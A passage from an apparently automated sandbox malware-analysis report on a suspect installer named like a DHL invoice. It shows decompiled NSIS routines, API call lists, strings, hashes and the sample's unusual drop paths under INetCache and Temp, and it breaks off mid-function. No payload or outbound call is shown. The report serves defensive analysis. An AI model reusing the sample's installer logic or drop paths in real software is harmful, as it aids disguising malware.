                                        control_flow_graph 431 405ffc-406007 432 406009-406018 431->432 433 40601a-406030 431->433 432->433 434 406221-406225 433->434 435 406036-406041 433->435 437 406053-40605d 434->437 438 40622b-406235 434->438 435->434 436 406047-40604e 435->436 436->434 437->438 439 406063-40606a 437->439 440 406240-406241 438->440 441 406237-40623b call 405fda 438->441 442 406070-4060a4 439->442 443 406214 439->443 441->440 445 4061c1-4061c4 442->445 446 4060aa-4060b4 442->446 447 406216-40621c 443->447 448 40621e-406220 443->448 451 4061f4-4061f7 445->451 452 4061c6-4061c9 445->452 449 4060b6-4060ba 446->449 450 4060ce 446->450 447->434 448->434 449->450 456 4060bc-4060c0 449->456 453 4060d5-4060dc 450->453 454 406205-406212 lstrlenA 451->454 455 4061f9-406200 call 405ffc 451->455 457 4061d9-4061e5 call 405fda 452->457 458 4061cb-4061d7 call 405f38 452->458 459 4060e1-4060e3 453->459 460 4060de-4060e0 453->460 454->434 455->454 456->450 463 4060c2-4060c6 456->463 468 4061ea-4061f0 457->468 458->468 466 4060e5-406100 call 405ec1 459->466 467 40611c-40611f 459->467 460->459 463->450 469 4060c8-4060cc 463->469 474 406105-406108 466->474 472 406121-40612d GetSystemDirectoryA 467->472 473 40612f-406132 467->473 468->454 471 4061f2 468->471 469->453 475 4061b9-4061bf call 406244 471->475 476 4061a3-4061a6 472->476 477 406134-406142 GetWindowsDirectoryA 473->477 478 40619f-4061a1 473->478 479 4061a8-4061ac 474->479 480 40610e-406117 call 405ffc 474->480 475->454 476->475 476->479 477->478 478->476 481 406144-40614e 478->481 479->475 484 4061ae-4061b4 lstrcatA 479->484 480->476 486 406150-406153 481->486 487 406168-40617e SHGetSpecialFolderLocation 481->487 484->475 486->487 491 406155-40615c 486->491 488 406180-40619a SHGetPathFromIDListA CoTaskMemFree 487->488 489 40619c 487->489 488->476 488->489 489->478 492 406164-406166 491->492 492->476 492->487
                                        C-Code - Quality: 72%
                                        			E00405FFC(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                        				struct _ITEMIDLIST* _v8;
                                        				char _v12;
                                        				signed int _v16;
                                        				signed char _v20;
                                        				signed int _v24;
                                        				signed char _v28;
                                        				signed int _t38;
                                        				CHAR* _t39;
                                        				signed int _t41;
                                        				char _t52;
                                        				char _t53;
                                        				char _t55;
                                        				char _t57;
                                        				void* _t65;
                                        				char* _t66;
                                        				signed int _t80;
                                        				intOrPtr _t86;
                                        				char _t88;
                                        				void* _t89;
                                        				CHAR* _t90;
                                        				void* _t92;
                                        				signed int _t97;
                                        				signed int _t99;
                                        				void* _t100;
                                        
                                        				_t92 = __esi;
                                        				_t89 = __edi;
                                        				_t65 = __ebx;
                                        				_t38 = _a8;
                                        				if(_t38 < 0) {
                                        					_t86 =  *0x422edc; // 0x4ebb51
                                        					_t38 =  *(_t86 - 4 + _t38 * 4);
                                        				}
                                        				_push(_t65);
                                        				_push(_t92);
                                        				_push(_t89);
                                        				_t66 = _t38 +  *0x423758;
                                        				_t39 = 0x4226a0;
                                        				_t90 = 0x4226a0;
                                        				if(_a4 >= 0x4226a0 && _a4 - 0x4226a0 < 0x800) {
                                        					_t90 = _a4;
                                        					_a4 = _a4 & 0x00000000;
                                        				}
                                        				while(1) {
                                        					_t88 =  *_t66;
                                        					if(_t88 == 0) {
                                        						break;
                                        					}
                                        					__eflags = _t90 - _t39 - 0x400;
                                        					if(_t90 - _t39 >= 0x400) {
                                        						break;
                                        					}
                                        					_t66 = _t66 + 1;
                                        					__eflags = _t88 - 4;
                                        					_a8 = _t66;
                                        					if(__eflags >= 0) {
                                        						if(__eflags != 0) {
                                        							 *_t90 = _t88;
                                        							_t90 =  &(_t90[1]);
                                        							__eflags = _t90;
                                        						} else {
                                        							 *_t90 =  *_t66;
                                        							_t90 =  &(_t90[1]);
                                        							_t66 = _t66 + 1;
                                        						}
                                        						continue;
                                        					}
                                        					_t41 =  *((char*)(_t66 + 1));
                                        					_t80 =  *_t66;
                                        					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                        					_v24 = _t80;
                                        					_v28 = _t80 | 0x00000080;
                                        					_v16 = _t41;
                                        					_v20 = _t41 | 0x00000080;
                                        					_t66 = _a8 + 2;
                                        					__eflags = _t88 - 2;
                                        					if(_t88 != 2) {
                                        						__eflags = _t88 - 3;
                                        						if(_t88 != 3) {
                                        							__eflags = _t88 - 1;
                                        							if(_t88 == 1) {
                                        								__eflags = (_t41 | 0xffffffff) - _t97;
                                        								E00405FFC(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                        							}
                                        							L42:
                                        							_t90 =  &(_t90[lstrlenA(_t90)]);
                                        							_t39 = 0x4226a0;
                                        							continue;
                                        						}
                                        						__eflags = _t97 - 0x1d;
                                        						if(_t97 != 0x1d) {
                                        							__eflags = (_t97 << 0xa) + 0x424000;
                                        							E00405FDA(_t90, (_t97 << 0xa) + 0x424000);
                                        						} else {
                                        							E00405F38(_t90,  *0x423708);
                                        						}
                                        						__eflags = _t97 + 0xffffffeb - 7;
                                        						if(_t97 + 0xffffffeb < 7) {
                                        							L33:
                                        							E00406244(_t90);
                                        						}
                                        						goto L42;
                                        					}
                                        					_t52 =  *0x42370c;
                                        					__eflags = _t52;
                                        					_t99 = 2;
                                        					if(_t52 >= 0) {
                                        						L13:
                                        						_a8 = 1;
                                        						L14:
                                        						__eflags =  *0x4237a4;
                                        						if( *0x4237a4 != 0) {
                                        							_t99 = 4;
                                        						}
                                        						__eflags = _t80;
                                        						if(__eflags >= 0) {
                                        							__eflags = _t80 - 0x25;
                                        							if(_t80 != 0x25) {
                                        								__eflags = _t80 - 0x24;
                                        								if(_t80 == 0x24) {
                                        									GetWindowsDirectoryA(_t90, 0x400);
                                        									_t99 = 0;
                                        								}
                                        								while(1) {
                                        									__eflags = _t99;
                                        									if(_t99 == 0) {
                                        										goto L30;
                                        									}
                                        									_t53 =  *0x423704;
                                        									_t99 = _t99 - 1;
                                        									__eflags = _t53;
                                        									if(_t53 == 0) {
                                        										L26:
                                        										_t55 = SHGetSpecialFolderLocation( *0x423708,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                        										__eflags = _t55;
                                        										if(_t55 != 0) {
                                        											L28:
                                        											 *_t90 =  *_t90 & 0x00000000;
                                        											__eflags =  *_t90;
                                        											continue;
                                        										}
                                        										__imp__SHGetPathFromIDListA(_v8, _t90);
                                        										_v12 = _t55;
                                        										__imp__CoTaskMemFree(_v8);
                                        										__eflags = _v12;
                                        										if(_v12 != 0) {
                                        											goto L30;
                                        										}
                                        										goto L28;
                                        									}
                                        									__eflags = _a8;
                                        									if(_a8 == 0) {
                                        										goto L26;
                                        									}
                                        									_t57 =  *_t53( *0x423708,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
                                        									__eflags = _t57;
                                        									if(_t57 == 0) {
                                        										goto L30;
                                        									}
                                        									goto L26;
                                        								}
                                        								goto L30;
                                        							}
                                        							GetSystemDirectoryA(_t90, 0x400);
                                        							goto L30;
                                        						} else {
                                        							E00405EC1((_t80 & 0x0000003f) +  *0x423758, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x423758, _t90, _t80 & 0x00000040); // executed
                                        							__eflags =  *_t90;
                                        							if( *_t90 != 0) {
                                        								L31:
                                        								__eflags = _v16 - 0x1a;
                                        								if(_v16 == 0x1a) {
                                        									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                        								}
                                        								goto L33;
                                        							}
                                        							E00405FFC(_t66, _t90, _t99, _t90, _v16);
                                        							L30:
                                        							__eflags =  *_t90;
                                        							if( *_t90 == 0) {
                                        								goto L33;
                                        							}
                                        							goto L31;
                                        						}
                                        					}
                                        					__eflags = _t52 - 0x5a04;
                                        					if(_t52 == 0x5a04) {
                                        						goto L13;
                                        					}
                                        					__eflags = _v16 - 0x23;
                                        					if(_v16 == 0x23) {
                                        						goto L13;
                                        					}
                                        					__eflags = _v16 - 0x2e;
                                        					if(_v16 == 0x2e) {
                                        						goto L13;
                                        					} else {
                                        						_a8 = _a8 & 0x00000000;
                                        						goto L14;
                                        					}
                                        				}
                                        				 *_t90 =  *_t90 & 0x00000000;
                                        				if(_a4 == 0) {
                                        					return _t39;
                                        				}
                                        				return E00405FDA(_a4, _t39);
                                        			}



























                                        0x00405ffc
                                        0x00405ffc
                                        0x00405ffc
                                        0x00406002
                                        0x00406007
                                        0x00406009
                                        0x00406018
                                        0x00406018
                                        0x00406020
                                        0x00406021
                                        0x00406022
                                        0x00406023
                                        0x00406026
                                        0x0040602e
                                        0x00406030
                                        0x00406047
                                        0x0040604a
                                        0x0040604a
                                        0x00406221
                                        0x00406221
                                        0x00406225
                                        0x00000000
                                        0x00000000
                                        0x00406057
                                        0x0040605d
                                        0x00000000
                                        0x00000000
                                        0x00406063
                                        0x00406064
                                        0x00406067
                                        0x0040606a
                                        0x00406214
                                        0x0040621e
                                        0x00406220
                                        0x00406220
                                        0x00406216
                                        0x00406218
                                        0x0040621a
                                        0x0040621b
                                        0x0040621b
                                        0x00000000
                                        0x00406214
                                        0x00406070
                                        0x00406074
                                        0x00406084
                                        0x0040608b
                                        0x0040608e
                                        0x00406096
                                        0x00406099
                                        0x004060a0
                                        0x004060a1
                                        0x004060a4
                                        0x004061c1
                                        0x004061c4
                                        0x004061f4
                                        0x004061f7
                                        0x004061fc
                                        0x00406200
                                        0x00406200
                                        0x00406205
                                        0x0040620b
                                        0x0040620d
                                        0x00000000
                                        0x0040620d
                                        0x004061c6
                                        0x004061c9
                                        0x004061de
                                        0x004061e5
                                        0x004061cb
                                        0x004061d2
                                        0x004061d2
                                        0x004061ed
                                        0x004061f0
                                        0x004061b9
                                        0x004061ba
                                        0x004061ba
                                        0x00000000
                                        0x004061f0
                                        0x004060aa
                                        0x004060b1
                                        0x004060b3
                                        0x004060b4
                                        0x004060ce
                                        0x004060ce
                                        0x004060d5
                                        0x004060d5
                                        0x004060dc
                                        0x004060e0
                                        0x004060e0
                                        0x004060e1
                                        0x004060e3
                                        0x0040611c
                                        0x0040611f
                                        0x0040612f
                                        0x00406132
                                        0x0040613a
                                        0x00406140
                                        0x00406140
                                        0x0040619f
                                        0x0040619f
                                        0x004061a1
                                        0x00000000
                                        0x00000000
                                        0x00406144
                                        0x0040614b
                                        0x0040614c
                                        0x0040614e
                                        0x00406168
                                        0x00406176
                                        0x0040617c
                                        0x0040617e
                                        0x0040619c
                                        0x0040619c
                                        0x0040619c
                                        0x00000000
                                        0x0040619c
                                        0x00406184
                                        0x0040618d
                                        0x00406190
                                        0x00406196
                                        0x0040619a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040619a
                                        0x00406150
                                        0x00406153
                                        0x00000000
                                        0x00000000
                                        0x00406162
                                        0x00406164
                                        0x00406166
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406166
                                        0x00000000
                                        0x0040619f
                                        0x00406127
                                        0x00000000
                                        0x004060e5
                                        0x00406100
                                        0x00406105
                                        0x00406108
                                        0x004061a8
                                        0x004061a8
                                        0x004061ac
                                        0x004061b4
                                        0x004061b4
                                        0x00000000
                                        0x004061ac
                                        0x00406112
                                        0x004061a3
                                        0x004061a3
                                        0x004061a6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004061a6
                                        0x004060e3
                                        0x004060b6
                                        0x004060ba
                                        0x00000000
                                        0x00000000
                                        0x004060bc
                                        0x004060c0
                                        0x00000000
                                        0x00000000
                                        0x004060c2
                                        0x004060c6
                                        0x00000000
                                        0x004060c8
                                        0x004060c8
                                        0x00000000
                                        0x004060c8
                                        0x004060c6
                                        0x0040622b
                                        0x00406235
                                        0x00406241
                                        0x00406241
                                        0x00000000

                                        APIs
                                        • GetSystemDirectoryA.KERNEL32 ref: 00406127
                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000), ref: 0040613A
                                        • SHGetSpecialFolderLocation.SHELL32(00405139,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000), ref: 00406176
                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406184
                                        • CoTaskMemFree.OLE32(00000000), ref: 00406190
                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061B4
                                        • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,00000000,004168C0,00000000), ref: 00406206
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 717251189-3633471332
                                        • Opcode ID: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                        • Instruction ID: f6f0e3a74e6b455581cb0d86726a6c3d239f08f65b325d122068a3aaf356d786
                                        • Opcode Fuzzy Hash: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                        • Instruction Fuzzy Hash: F4610571A00115ABEF20AF64DC84B7A3BA4DB55314F12417FEA03BA2D2C23C4962DB5E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 562 401759-40177c call 402b2c call 4059df 567 401786-401798 call 405fda call 405972 lstrcatA 562->567 568 40177e-401784 call 405fda 562->568 573 40179d-4017a3 call 406244 567->573 568->573 578 4017a8-4017ac 573->578 579 4017ae-4017b8 call 4062dd 578->579 580 4017df-4017e2 578->580 587 4017ca-4017dc 579->587 588 4017ba-4017c8 CompareFileTime 579->588 582 4017e4-4017e5 call 405b4e 580->582 583 4017ea-401806 call 405b73 580->583 582->583 590 401808-40180b 583->590 591 40187e-4018a7 call 405101 call 402ffb 583->591 587->580 588->587 592 401860-40186a call 405101 590->592 593 40180d-40184f call 405fda * 2 call 405ffc call 405fda call 4056f6 590->593 603 4018a9-4018ad 591->603 604 4018af-4018bb SetFileTime 591->604 605 401873-401879 592->605 593->578 625 401855-401856 593->625 603->604 608 4018c1-4018cc FindCloseChangeNotification 603->608 604->608 609 4029c1 605->609 611 4018d2-4018d5 608->611 612 4029b8-4029bb 608->612 613 4029c3-4029c7 609->613 615 4018d7-4018e8 call 405ffc lstrcatA 611->615 616 4018ea-4018ed call 405ffc 611->616 612->609 622 4018f2-402349 615->622 616->622 626 40234e-402353 622->626 627 402349 call 4056f6 622->627 625->605 628 401858-401859 625->628 626->613 627->626 628->592
                                        C-Code - Quality: 61%
                                        			E00401759(FILETIME* __ebx, void* __eflags) {
                                        				void* _t33;
                                        				void* _t41;
                                        				void* _t43;
                                        				FILETIME* _t49;
                                        				FILETIME* _t62;
                                        				void* _t64;
                                        				signed int _t70;
                                        				FILETIME* _t71;
                                        				FILETIME* _t75;
                                        				signed int _t77;
                                        				void* _t80;
                                        				CHAR* _t82;
                                        				CHAR* _t83;
                                        				void* _t85;
                                        
                                        				_t75 = __ebx;
                                        				_t82 = E00402B2C(0x31);
                                        				 *(_t85 - 8) = _t82;
                                        				 *(_t85 + 8) =  *(_t85 - 0x34) & 0x00000007;
                                        				_t33 = E004059DF(_t82);
                                        				_push(_t82);
                                        				_t83 = "Call";
                                        				if(_t33 == 0) {
                                        					lstrcatA(E00405972(E00405FDA(_t83, "C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto\\Styringsmidlernes\\Pinkfishes109\\Supersensitizations172\\Smaskforvirrede")), ??);
                                        				} else {
                                        					E00405FDA();
                                        				}
                                        				E00406244(_t83);
                                        				while(1) {
                                        					__eflags =  *(_t85 + 8) - 3;
                                        					if( *(_t85 + 8) >= 3) {
                                        						_t64 = E004062DD(_t83);
                                        						_t77 = 0;
                                        						__eflags = _t64 - _t75;
                                        						if(_t64 != _t75) {
                                        							_t71 = _t64 + 0x14;
                                        							__eflags = _t71;
                                        							_t77 = CompareFileTime(_t71, _t85 - 0x28);
                                        						}
                                        						asm("sbb eax, eax");
                                        						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                        						__eflags = _t70;
                                        						 *(_t85 + 8) = _t70;
                                        					}
                                        					__eflags =  *(_t85 + 8) - _t75;
                                        					if( *(_t85 + 8) == _t75) {
                                        						E00405B4E(_t83);
                                        					}
                                        					__eflags =  *(_t85 + 8) - 1;
                                        					_t41 = E00405B73(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                        					__eflags = _t41 - 0xffffffff;
                                        					 *(_t85 - 0xc) = _t41;
                                        					if(_t41 != 0xffffffff) {
                                        						break;
                                        					}
                                        					__eflags =  *(_t85 + 8) - _t75;
                                        					if( *(_t85 + 8) != _t75) {
                                        						E00405101(0xffffffe2,  *(_t85 - 8));
                                        						__eflags =  *(_t85 + 8) - 2;
                                        						if(__eflags == 0) {
                                        							 *((intOrPtr*)(_t85 - 4)) = 1;
                                        						}
                                        						L31:
                                        						 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t85 - 4));
                                        						__eflags =  *0x4237a8;
                                        						goto L32;
                                        					} else {
                                        						E00405FDA(0x409be8, 0x424000);
                                        						E00405FDA(0x424000, _t83);
                                        						E00405FFC(_t75, 0x409be8, _t83, "C:\Users\hardz\AppData\Local\Temp\nsf4536.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x20)));
                                        						E00405FDA(0x424000, 0x409be8);
                                        						_t62 = E004056F6("C:\Users\hardz\AppData\Local\Temp\nsf4536.tmp\System.dll",  *(_t85 - 0x34) >> 3) - 4;
                                        						__eflags = _t62;
                                        						if(_t62 == 0) {
                                        							continue;
                                        						} else {
                                        							__eflags = _t62 == 1;
                                        							if(_t62 == 1) {
                                        								 *0x4237a8 =  &( *0x4237a8->dwLowDateTime);
                                        								L32:
                                        								_t49 = 0;
                                        								__eflags = 0;
                                        							} else {
                                        								_push(_t83);
                                        								_push(0xfffffffa);
                                        								E00405101();
                                        								L29:
                                        								_t49 = 0x7fffffff;
                                        							}
                                        						}
                                        					}
                                        					L33:
                                        					return _t49;
                                        				}
                                        				E00405101(0xffffffea,  *(_t85 - 8)); // executed
                                        				 *0x4237d4 =  *0x4237d4 + 1;
                                        				_push(_t75);
                                        				_push(_t75);
                                        				_push( *(_t85 - 0xc));
                                        				_push( *((intOrPtr*)(_t85 - 0x2c)));
                                        				_t43 = E00402FFB(); // executed
                                        				 *0x4237d4 =  *0x4237d4 - 1;
                                        				__eflags =  *(_t85 - 0x28) - 0xffffffff;
                                        				_t80 = _t43;
                                        				if( *(_t85 - 0x28) != 0xffffffff) {
                                        					L22:
                                        					SetFileTime( *(_t85 - 0xc), _t85 - 0x28, _t75, _t85 - 0x28); // executed
                                        				} else {
                                        					__eflags =  *((intOrPtr*)(_t85 - 0x24)) - 0xffffffff;
                                        					if( *((intOrPtr*)(_t85 - 0x24)) != 0xffffffff) {
                                        						goto L22;
                                        					}
                                        				}
                                        				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                        				__eflags = _t80 - _t75;
                                        				if(_t80 >= _t75) {
                                        					goto L31;
                                        				} else {
                                        					__eflags = _t80 - 0xfffffffe;
                                        					if(_t80 != 0xfffffffe) {
                                        						E00405FFC(_t75, _t80, _t83, _t83, 0xffffffee);
                                        					} else {
                                        						E00405FFC(_t75, _t80, _t83, _t83, 0xffffffe9);
                                        						lstrcatA(_t83,  *(_t85 - 8));
                                        					}
                                        					_push(0x200010);
                                        					_push(_t83);
                                        					E004056F6();
                                        					goto L29;
                                        				}
                                        				goto L33;
                                        			}

















                                        0x00401759
                                        0x00401760
                                        0x00401769
                                        0x0040176c
                                        0x0040176f
                                        0x00401774
                                        0x00401775
                                        0x0040177c
                                        0x00401798
                                        0x0040177e
                                        0x0040177f
                                        0x0040177f
                                        0x0040179e
                                        0x004017a8
                                        0x004017a8
                                        0x004017ac
                                        0x004017af
                                        0x004017b4
                                        0x004017b6
                                        0x004017b8
                                        0x004017bd
                                        0x004017bd
                                        0x004017c8
                                        0x004017c8
                                        0x004017d9
                                        0x004017db
                                        0x004017db
                                        0x004017dc
                                        0x004017dc
                                        0x004017df
                                        0x004017e2
                                        0x004017e5
                                        0x004017e5
                                        0x004017ec
                                        0x004017fb
                                        0x00401800
                                        0x00401803
                                        0x00401806
                                        0x00000000
                                        0x00000000
                                        0x00401808
                                        0x0040180b
                                        0x00401865
                                        0x0040186a
                                        0x004015b0
                                        0x00402783
                                        0x00402783
                                        0x004029b8
                                        0x004029bb
                                        0x004029bb
                                        0x00000000
                                        0x0040180d
                                        0x00401813
                                        0x0040181e
                                        0x0040182b
                                        0x00401836
                                        0x0040184c
                                        0x0040184c
                                        0x0040184f
                                        0x00000000
                                        0x00401855
                                        0x00401855
                                        0x00401856
                                        0x00401873
                                        0x004029c1
                                        0x004029c1
                                        0x004029c1
                                        0x00401858
                                        0x00401858
                                        0x00401859
                                        0x00401492
                                        0x0040234e
                                        0x0040234e
                                        0x0040234e
                                        0x00401856
                                        0x0040184f
                                        0x004029c3
                                        0x004029c7
                                        0x004029c7
                                        0x00401883
                                        0x00401888
                                        0x0040188e
                                        0x0040188f
                                        0x00401890
                                        0x00401893
                                        0x00401896
                                        0x0040189b
                                        0x004018a1
                                        0x004018a5
                                        0x004018a7
                                        0x004018af
                                        0x004018bb
                                        0x004018a9
                                        0x004018a9
                                        0x004018ad
                                        0x00000000
                                        0x00000000
                                        0x004018ad
                                        0x004018c4
                                        0x004018ca
                                        0x004018cc
                                        0x00000000
                                        0x004018d2
                                        0x004018d2
                                        0x004018d5
                                        0x004018ed
                                        0x004018d7
                                        0x004018da
                                        0x004018e3
                                        0x004018e3
                                        0x004018f2
                                        0x004018f7
                                        0x00402349
                                        0x00000000
                                        0x00402349
                                        0x00000000

                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede,00000000,00000000,00000031), ref: 00401798
                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede,00000000,00000000,00000031), ref: 004017C2
                                          • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7
                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                          • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                          • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll), ref: 0040516F
                                          • Part of subcall function 00405101: SendMessageA.USER32 ref: 00405195
                                          • Part of subcall function 00405101: SendMessageA.USER32 ref: 004051AF
                                          • Part of subcall function 00405101: SendMessageA.USER32 ref: 004051BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede$C:\Users\user\AppData\Local\Temp\nsf4536.tmp$C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll$Call
                                        • API String ID: 1941528284-1330545410
                                        • Opcode ID: 3398521465f4744d5abe34836e8d3ca427fef63b03b80e7ecba10af39f1564d3
                                        • Instruction ID: a8f8d2e71aafd7953ecb4fd9af401e61999b8e286ce35665580707d8cc6a98aa
                                        • Opcode Fuzzy Hash: 3398521465f4744d5abe34836e8d3ca427fef63b03b80e7ecba10af39f1564d3
                                        • Instruction Fuzzy Hash: BC41D371A0451ABACB107FA5DC45D9F3AB9EF05329B20823BF411F10E1C63C8A419B6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 629 405101-405116 630 4051cc-4051d0 629->630 631 40511c-40512e 629->631 632 405130-405134 call 405ffc 631->632 633 405139-405145 lstrlenA 631->633 632->633 635 405162-405166 633->635 636 405147-405157 lstrlenA 633->636 638 405175-405179 635->638 639 405168-40516f SetWindowTextA 635->639 636->630 637 405159-40515d lstrcatA 636->637 637->635 640 40517b-4051bd SendMessageA * 3 638->640 641 4051bf-4051c1 638->641 639->638 640->641 641->630 642 4051c3-4051c6 641->642 642->630
                                        C-Code - Quality: 100%
                                        			E00405101(CHAR* _a4, CHAR* _a8) {
                                        				struct HWND__* _v8;
                                        				signed int _v12;
                                        				CHAR* _v32;
                                        				long _v44;
                                        				int _v48;
                                        				void* _v52;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				CHAR* _t26;
                                        				signed int _t27;
                                        				CHAR* _t28;
                                        				long _t29;
                                        				signed int _t39;
                                        
                                        				_t26 =  *0x422ee4; // 0x103f8
                                        				_v8 = _t26;
                                        				if(_t26 != 0) {
                                        					_t27 =  *0x4237d4;
                                        					_v12 = _t27;
                                        					_t39 = _t27 & 0x00000001;
                                        					if(_t39 == 0) {
                                        						E00405FFC(0, _t39, 0x41f4e8, 0x41f4e8, _a4);
                                        					}
                                        					_t26 = lstrlenA(0x41f4e8);
                                        					_a4 = _t26;
                                        					if(_a8 == 0) {
                                        						L6:
                                        						if((_v12 & 0x00000004) == 0) {
                                        							_t26 = SetWindowTextA( *0x422ec8, 0x41f4e8); // executed
                                        						}
                                        						if((_v12 & 0x00000002) == 0) {
                                        							_v32 = 0x41f4e8;
                                        							_v52 = 1;
                                        							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                        							_v44 = 0;
